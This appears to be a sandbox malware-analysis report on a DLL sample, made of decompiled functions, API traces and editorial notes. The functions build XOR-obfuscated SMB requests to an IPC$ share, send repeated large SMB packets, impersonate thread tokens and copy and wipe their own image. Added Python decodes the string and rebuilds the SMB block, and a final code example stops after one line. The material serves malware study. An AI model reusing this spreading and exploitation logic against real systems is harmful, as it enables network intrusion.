    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7080
    • HeapFree.KERNEL32(00000000), ref: 011E7083
    • GetProcessHeap.KERNEL32(00000000,00000000,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7088
    • HeapFree.KERNEL32(00000000), ref: 011E708B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 87%
    			E011E9EC7(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				void* _v8;
    				void*** _v12;
    				intOrPtr _v16;
    				intOrPtr _v28;
    				void _v32;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t22;
    				void* _t29;
    				struct _SECURITY_ATTRIBUTES* _t39;
    				void _t41;
    				void* _t44;
    
    				_t39 = 0;
    				_t41 = 0;
    				_v12 = 0;
    				_t22 = E011E711F(0,  &_v12);
    				_v16 = _t22;
    				if(_t22 == 0) {
    					L12:
    					return _t41;
    				}
    				while(1) {
    					_t44 =  *( *_v12);
    					_v32 = _t39;
    					asm("stosd");
    					asm("stosd");
    					asm("stosd");
    					_v28 = _a4;
    					_t29 = CreateThread(_t39, _t39, E011E9EA4,  &_v32, 4, _t39);
    					_v8 = _t29;
    					if(_t29 != _t39) {
    						if(SetThreadToken( &_v8, _t44) != 0) {
    							if(ResumeThread(_v8) == 0xffffffff) {
    								GetLastError();
    							} else {
    								WaitForSingleObject(_v8, 0xffffffff);
    							}
    						}
    						CloseHandle(_v8);
    					}
    					_t41 = _v32;
    					if(_t41 != _t39 || E011E7167(_v16, _a8,  &_v12) == 0) {
    						break;
    					}
    					_t39 = 0;
    				}
    				E011E6F78(_v16);
    				goto L12;
    			}

    APIs
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
      • Part of subcall function 011E711F: HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
      • Part of subcall function 011E711F: HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    • CreateThread.KERNEL32(00000000,00000000,011E9EA4,?,00000004,00000000), ref: 011E9F19
    • SetThreadToken.ADVAPI32(?,?), ref: 011E9F2B
    • ResumeThread.KERNEL32(?), ref: 011E9F38
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9F48
    • GetLastError.KERNEL32 ref: 011E9F50
    • CloseHandle.KERNEL32(?), ref: 011E9F59
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8320(WCHAR* _a4) {
    				WCHAR* _t6;
    				short _t8;
    
    				_t8 = 0;
    				if(PathCombineW(_a4, L"C:\\Windows\\", PathFindFileNameW(?str?)) != 0) {
    					_t6 = PathFindExtensionW(_a4);
    					if(_t6 != 0) {
    						 *_t6 = 0;
    						_t8 = 1;
    					}
    				}
    				return _t8;
    			}

    APIs
    • PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
    • PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
    • PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    Strings
    • C:\Users\luketaylor\Desktop\abc.dll, xrefs: 011E8324
    • C:\Windows\, xrefs: 011E8332
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6A2B(void* __ecx, short* _a4) {
    				int _v8;
    				intOrPtr* _t15;
    				int _t21;
    				WCHAR* _t25;
    				signed int _t30;
    				void* _t34;
    				WCHAR* _t38;
    				void* _t40;
    
    				if(_a4 != 0) {
    					_t15 = _a4;
    					_t34 = _t15 + 2;
    					do {
    						_t33 =  *_t15;
    						_t15 = _t15 + 2;
    					} while (_t33 != 0);
    					if(_t15 != _t34) {
    						_v8 = 0;
    						_t40 = CommandLineToArgvW(_a4,  &_v8);
    						if(_t40 != 0) {
    							if(_v8 > 0) {
    								_t21 = StrToIntW( *_t40);
    								_t30 = 1;
    								if(_t21 > 0) {
    									 *0x11ff760 = _t21;
    								}
    								if(_v8 > _t30) {
    									while(1) {
    										_t38 =  *(_t40 + _t30 * 4);
    										if(_t38 == StrStrW(_t38, 0x11f3ff0)) {
    											break;
    										}
    										_t25 = StrChrW(_t38, 0x3a);
    										if(_t25 != 0) {
    											_t33 = 0;
    											 *_t25 = 0;
    											E011E6DE0(_t38,  &(_t25[1]), 1);
    										}
    										_t30 = _t30 + 1;
    										if(_t30 < _v8) {
    											continue;
    										} else {
    										}
    										goto L15;
    									}
    									E011E69A2( *(_t40 + _t30 * 4), _t33);
    								}
    								L15:
    							}
    							LocalFree(_t40);
    						}
    					}
    				}
    				if( *0x11ff760 == 0) {
    					 *0x11ff760 = 0x3c;
    				}
    				return 0;
    			}

    APIs
    • CommandLineToArgvW.SHELL32(?,?), ref: 011E6A61
    • StrToIntW.SHLWAPI(00000000), ref: 011E6A75
    • StrStrW.SHLWAPI(00000000,011F3FF0), ref: 011E6A95
    • StrChrW.SHLWAPI(00000000,0000003A), ref: 011E6AA2
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
      • Part of subcall function 011E69A2: CommandLineToArgvW.SHELL32(-00000004,?), ref: 011E69D8
      • Part of subcall function 011E69A2: LocalFree.KERNEL32(00000000,?,?,?,011E6ACD,?,?,00000000,?,?,011E7E71,?), ref: 011E6A1E
    • LocalFree.KERNEL32(00000000,?,00000000,?,?,011E7E71,?), ref: 011E6ACF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E7091(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				void* __esi;
    				signed int _t14;
    				void* _t17;
    				struct _CRITICAL_SECTION* _t24;
    
    				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
    				if(_t24 != 0) {
    					InitializeCriticalSection(_t24);
    					_t14 = _a16;
    					 *(_t24 + 0x20) = _t14;
    					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
    					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
    					_t22 = _a12;
    					 *((intOrPtr*)(_t24 + 0x24)) = 0;
    					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
    					_t17 = HeapAlloc(GetProcessHeap(), 8, _t14 << 2);
    					 *(_t24 + 0x18) = _t17;
    					if(_t17 == 0) {
    						E011E7003(_t22, _t24);
    						_t24 = 0;
    					}
    				}
    				return _t24;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
    • HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
    • InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
    • GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
    • HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E705B
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E705E
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E706B
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E706E
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7080
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E7083
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,00000000,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7088
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E708B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E407B(void* __ecx, signed short* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				void* _v8;
    				signed int _v12;
    				void* _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* __ebx;
    				void* __esi;
    				signed int _t82;
    				signed int _t83;
    				void* _t84;
    				void* _t85;
    				signed int _t86;
    				void* _t88;
    				void* _t93;
    				void* _t98;
    				void* _t100;
    				void* _t104;
    				signed int _t112;
    				void* _t116;
    				signed short* _t132;
    				void** _t134;
    				void* _t142;
    				void* _t143;
    
    				_t132 = __edi;
    				_v36 = _a12 & 0x0000ffff;
    				_t82 = E011E3061(_a4, __ecx, _a8,  &_v36, _a16, _a20,  *__edi & 0x0000ffff);
    				if(_t82 == 0) {
    					_t83 = E011E1000(0x8e);
    					_t112 = 0;
    					_v8 = _t83;
    					__eflags = _t83;
    					if(_t83 != 0) {
    						_v20 = 0;
    						_t84 = E011E1000(0x1000);
    						_v16 = _t84;
    						__eflags = _t84;
    						if(_t84 == 0) {
    							L18:
    							_t134 =  &_v8;
    							L21:
    							_t85 = E011E20D0(_t134);
    							L25:
    							_t86 = _t85 | 0xffffffff;
    							L27:
    							L28:
    							return _t86;
    						}
    						 *__edi =  *__edi + 1;
    						_v24 = 0;
    						_v32 = 0;
    						_v12 = 0x8000;
    						_t88 = E011E2C1E(_a24, 0x7e00, 0xc007, _a8, _a12, _a16, _a20,  *__edi & 0x0000ffff, 0, 0xff,  &_v20);
    						_v28 = _t88;
    						__eflags = _t88;
    						if(_t88 != 0) {
    							while(1) {
    								memcpy(_v8, _t88, _v20 & 0x0000ffff);
    								_t143 = _t142 + 0xc;
    								E011E20D0( &_v28);
    								_t93 = E011E2C1E(_a24, _v12 + 0xfffffe00, 0xc007, _a8, _v36, _a16, _a20,  *_t132 & 0x0000ffff, _t112, 0xff,  &_v20);
    								_v28 = _t93;
    								__eflags = _t93 - _t112;
    								if(_t93 == _t112) {
    									goto L6;
    								}
    								_t123 = _v20 & 0x0000ffff;
    								_t35 = _v8 + 0x47; // 0x76e6c46d
    								memcpy(_t35, _t93, _v20 & 0x0000ffff);
    								_t142 = _t143 + 0xc;
    								E011E20D0( &_v28);
    								_t98 = E011E688F(_a4, _v8, 0x8e);
    								__eflags = _t98;
    								if(_t98 != 0) {
    									L17:
    									E011E20D0( &_v16);
    									goto L18;
    								}
    								_t116 = _v16;
    								_t100 = E011E243F(_t123, _a4, 2, _t116);
    								__eflags = _t100;
    								if(_t100 != 0) {
    									goto L17;
    								}
    								__eflags =  *((intOrPtr*)(_t116 + 9)) - _t100;
    								if( *((intOrPtr*)(_t116 + 9)) != _t100) {
    									goto L6;
    								}
    								_v32 = _v32 + (_v12 & 0x0000ffff);
    								_v12 = _v12 + 0x1000;
    								__eflags = _v12 - 0xc000;
    								if(_v12 > 0xc000) {
    									_v12 = 0x8000;
    								}
    								__eflags = _v32 - 0x100000;
    								if(_v32 >= 0x100000) {
    									_t104 = E011E30FE(_t123, _a4, _a8, _v36, _a16, _a20,  *_t132 & 0x0000ffff);
    									_t137 =  &_v8;
    									__eflags = _t104;
    									if(_t104 == 0) {
    										E011E20D0( &_v8);
    										E011E20D0( &_v16);
    										Sleep(0x456);
    										_v24 = _v24 & 0x00000000;
    										while(1) {
    											 *_t132 =  *_t132 + 1;
    											_t85 = E011E35FA(_a4, _t123, 0xfe80, __eflags, 0xc007, _a8, _a12, _a16, _a20,  *_t132 & 0x0000ffff, 0, 0xff, _a24);
    											__eflags = _t85;
    											if(_t85 != 0) {
    												goto L25;
    											}
    											_v24 = _v24 + 1;
    											__eflags = _v24 - 0x37;
    											if(__eflags > 0) {
    												_t86 = 0;
    												__eflags = 0;
    												goto L27;
    											}
    										}
    										goto L25;
    									}
    									L20:
    									E011E20D0(_t137);
    									_t134 =  &_v16;
    									goto L21;
    								} else {
    									 *_t132 =  *_t132 + 1;
    									_t88 = E011E2C1E(_a24, _v12 + 0xfffffe00, 0xc007, _a8, _a12, _a16, _a20,  *_t132 & 0x0000ffff, 0, 0xff,  &_v20);
    									_v28 = _t88;
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0;
    										__eflags = 0;
    										continue;
    									}
    									goto L6;
    								}
    							}
    						}
    						L6:
    						_t137 =  &_v8;
    						goto L20;
    					}
    					_t86 = _t83 | 0xffffffff;
    					goto L28;
    				}
    				return _t82 | 0xffffffff;
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E4138
    • memcpy.MSVCRT ref: 011E418C
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E2C1E: memcpy.MSVCRT ref: 011E2CAD
    • Sleep.KERNEL32(00000456,00001000,002F1C10,?,002F1C10,?,0000C000,00008000,00000002,002F1C10,76E6C426,0000008E,00000000,000000FF,00058778,002F1C10), ref: 011E4287
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E29CE(signed short* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
    				void* _v8;
    				signed int _v12;
    				char _v16;
    				void* __esi;
    				void* _t26;
    				void* _t28;
    				signed int _t29;
    				short _t30;
    				short _t31;
    				int _t34;
    				void* _t37;
    				void* _t39;
    				signed short _t40;
    				signed short* _t51;
    				void* _t52;
    				void* _t53;
    				signed int _t54;
    				void* _t56;
    				signed int _t61;
    				void* _t64;
    				void* _t69;
    				void* _t70;
    
    				_t51 = __eax;
    				_t26 = E011E1000(0x2d);
    				_t56 = _t26;
    				_v8 = _t56;
    				if(_t56 == 0) {
    					return _t26;
    				}
    				memcpy(_t56, "u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu", 0x2d);
    				_t70 = _t69 + 0xc;
    				_t28 = _t56;
    				_t53 = 0x2d;
    				do {
    					 *_t28 =  *_t28 ^ 0x00000075;
    					_t28 = _t28 + 1;
    					_t53 = _t53 - 1;
    				} while (_t53 != 0);
    				_t29 = E011E1000(0x38);
    				_t61 = _t29;
    				if(_t61 != 0) {
    					_t30 = 0x58;
    					 *((short*)(_t61 + 3)) = _t30;
    					_t31 = 8;
    					 *((short*)(_t61 + 5)) = _t31;
    					 *((short*)(_t61 + 7)) = 1;
    					_t34 = 0x2d;
    					 *(_t61 + 9) = _t34;
    					_t8 = _t61 + 0xb; // 0xb
    					 *_t61 = 0xff04;
    					memcpy(_t8, _t56, _t34);
    					_t70 = _t70 + 0xc;
    					_v12 = _t61;
    				} else {
    					_v12 = _v12 & _t29;
    				}
    				_t37 = _v12;
    				_v16 = _t37;
    				if(_t37 == 0) {
    					L9:
    					E011E20D0( &_v8);
    					_t39 = 0;
    					goto L10;
    				} else {
    					_t40 = 0x5c;
    					 *_t51 = _t40;
    					_t64 = E011E2466(_t40, 0x75, 0xc007, _a4, 0, _a8, _a12, _a16);
    					_a16 = _t64;
    					if(_t64 != 0) {
    						_t52 = E011E1000( *_t51 & 0x0000ffff);
    						if(_t52 != 0) {
    							_t54 = 9;
    							_t23 = _t52 + 0x24; // 0x24
    							memcpy(_t52, _t64, _t54 << 2);
    							memcpy(_t23, _v12, 0x38);
    						}
    						E011E20D0( &_v16);
    						E011E20D0( &_v8);
    						E011E20D0( &_a16);
    						_t39 = _t52;
    						L10:
    						return _t39;
    					}
    					E011E20D0( &_v16);
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E29F4
    • memcpy.MSVCRT ref: 011E2A42
    • memcpy.MSVCRT ref: 011E2AD5
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Strings
    • u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu, xrefs: 011E29EE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
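The 45-byte literal in E011E29CE is copied to the heap and then XORed byte by byte with 0x75 (the loop at 011E2A01), and 0x75 is also the second argument later handed to E011E2466. The stores that follow (the 16-bit 0xff04 at +0, 0x58 at +3, 8 at +5, 1 at +7, 0x2d at +9, the decoded bytes at +0xb of a 0x38-byte buffer) line up with the parameter block of an SMB_COM_TREE_CONNECT_ANDX request (WordCount 4, AndXCommand 0xFF, AndXOffset, Flags, PasswordLength, ByteCount, then password, UNC path and service string), and 0x75 is that command's code. That reading is the editor's, not something the report states; the decoder below is an added example, not code from the sandbox or the sample. It reproduces the XOR, rebuilds the buffer exactly as the decompiled stores write it, and splits the data area; the embedded address is whatever the literal decodes to, and this function alone does not show whether it is rewritten before the request is sent.

```python
import struct

# Literal and key copied from the decompiled function E011E29CE
XOR_STRING = b"u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu"
XOR_KEY = 0x75


def decode_literal(blob: bytes = XOR_STRING, key: int = XOR_KEY) -> bytes:
    """Replicate the byte-wise XOR loop at 011E2A01."""
    return bytes(b ^ key for b in blob)


def build_block(payload: bytes) -> bytes:
    """Rebuild the 0x38-byte buffer E011E29CE fills before the copy at 011E2A42.
    Offsets follow the decompiled stores; the field names are the
    SMB_COM_TREE_CONNECT_ANDX layout (analyst interpretation, not from the page)."""
    buf = bytearray(0x38)
    struct.pack_into("<H", buf, 0, 0xFF04)         # WordCount=4, AndXCommand=0xFF (none)
    struct.pack_into("<H", buf, 3, 0x58)           # AndXOffset
    struct.pack_into("<H", buf, 5, 8)              # Flags
    struct.pack_into("<H", buf, 7, 1)              # PasswordLength
    struct.pack_into("<I", buf, 9, len(payload))   # ByteCount, written as a 32-bit store
    buf[0xB:0xB + len(payload)] = payload          # memcpy(_t61 + 0xb, decoded, 0x2d)
    return bytes(buf)


def parse_block(block: bytes) -> dict:
    """Split the data area into password, UTF-16LE UNC path and ASCII service."""
    byte_count = struct.unpack_from("<H", block, 9)[0]
    pw_len = struct.unpack_from("<H", block, 7)[0]
    data = block[0xB:0xB + byte_count]
    password, rest = data[:pw_len], data[pw_len:]
    end = rest.find(b"\x00\x00")
    while end % 2:                       # terminator must sit on a code-unit boundary
        end = rest.find(b"\x00\x00", end + 1)
    return {
        "word_count": block[0],
        "andx_command": block[1],
        "password": password,
        "path": rest[:end].decode("utf-16-le"),
        "service": rest[end + 2:].split(b"\x00", 1)[0].decode("ascii"),
    }


def decoded_request() -> dict:
    """Decode the literal and parse the buffer exactly as the function builds it."""
    return parse_block(build_block(decode_literal()))


if __name__ == "__main__":
    print(decoded_request())
```

The decoded data area is a single NUL password byte, a UTF-16LE UNC path to an IPC$ share, and the service string "?????"; the same split is what a packet dissector would show if the buffer went on the wire as a TreeConnectAndX request.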
    C-Code - Quality: 85%
    			E011E9590(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				long _v8;
    				long _v12;
    				void* __esi;
    				void* _t14;
    				void* _t19;
    				void* _t22;
    				void* _t31;
    				long _t35;
    				void* _t40;
    				intOrPtr _t42;
    				int _t44;
    				void* _t47;
    				long _t48;
    				intOrPtr _t51;
    				intOrPtr _t52;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t51 =  *0x11ff114; // 0x1
    				if(_t51 != 0) {
    					L15:
    					return 0;
    				}
    				_t52 =  *0x11ff0fc; // 0x2f1c10
    				if(_t52 == 0) {
    					goto L15;
    				}
    				_t14 =  *0x11ff120; // 0x11e0000
    				_t1 = _t14 + 0x3c; // 0xf0
    				_t44 =  *( *_t1 + _t14 + 0x50);
    				_t40 = _t14;
    				_v8 = _t44;
    				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
    				if(_t31 == 0) {
    					L14:
    					goto L15;
    				}
    				 *0x11ff13c = _t31;
    				memcpy(_t31, _t40, _t44);
    				_t42 =  *0x11ff0fc; // 0x2f1c10
    				_t5 = _t42 + 0x3c; // 0xf0
    				_t47 =  *_t5 + _t42;
    				if(_t47 != 0) {
    					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
    					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
    						_t22 = E011E9322(_t47, _t21);
    						_t23 = _t22 + _t42;
    						if(_t22 + _t42 != 0 && E011E91FA(_t23, _t31) != 0 && E011E9286(_t47, _t31) != 0) {
    							_push(0xffffffff);
    							_push(_a12);
    							_push(_a8);
    							_push(_a4);
    							 *((intOrPtr*)(E011E94A5 -  *0x11ff120 + _t31))();
    						}
    					}
    				}
    				_t48 = _v8;
    				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
    					goto L14;
    				}
    				_t35 = _t48;
    				_t19 = _t31;
    				if(_t48 == 0) {
    					L13:
    					VirtualFree(_t31, _t48, 0x4000);
    					goto L14;
    				} else {
    					goto L12;
    				}
    				do {
    					L12:
    					 *_t19 = 0;
    					_t19 = _t19 + 1;
    					_t35 = _t35 - 1;
    				} while (_t35 != 0);
    				goto L13;
    			}

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,011E7E14,?,?,?), ref: 011E95CC
    • memcpy.MSVCRT ref: 011E95E5
    • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 011E9654
    • VirtualFree.KERNEL32(00000000,?,00004000), ref: 011E9674
      • Part of subcall function 011E9286: VirtualProtect.KERNEL32(?,?,00000002,?,00000000), ref: 011E92A3
      • Part of subcall function 011E9286: VirtualProtect.KERNEL32(00000000,?,00000002,?,002F1C10), ref: 011E9301
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
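E011E9590 reads e_lfanew at image+0x3C, takes SizeOfImage from NT headers +0x50 of the module at *0x11ff120 (0x11e0000, the loaded image), VirtualAllocs a writable copy of that size and memcpy's the whole mapped image into it. It then reads the base relocation directory (VirtualAddress at +0xA0, Size at +0xA4 of the NT headers) from the buffer at *0x11ff0fc (0x2f1c10), runs E011E9322/E011E91FA/E011E9286 on the copy (the last two call VirtualProtect), and calls E011E94A5 rebased into the copy. Afterwards the copy is set to PAGE_READWRITE, zeroed byte by byte and decommitted with VirtualFree(MEM_DECOMMIT). That it applies base relocations is the editor's reading of the directory fields it reads, not something the report confirms, and what E011E94A5 does is not shown. The example below is added here (not sandbox or sample code): it builds a constructed 32-bit image whose RVAs equal offsets (true of a memcpy'd mapped image), verifies the header offsets the function uses, and applies IMAGE_REL_BASED_HIGHLOW fixups for a new base.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, no fixup
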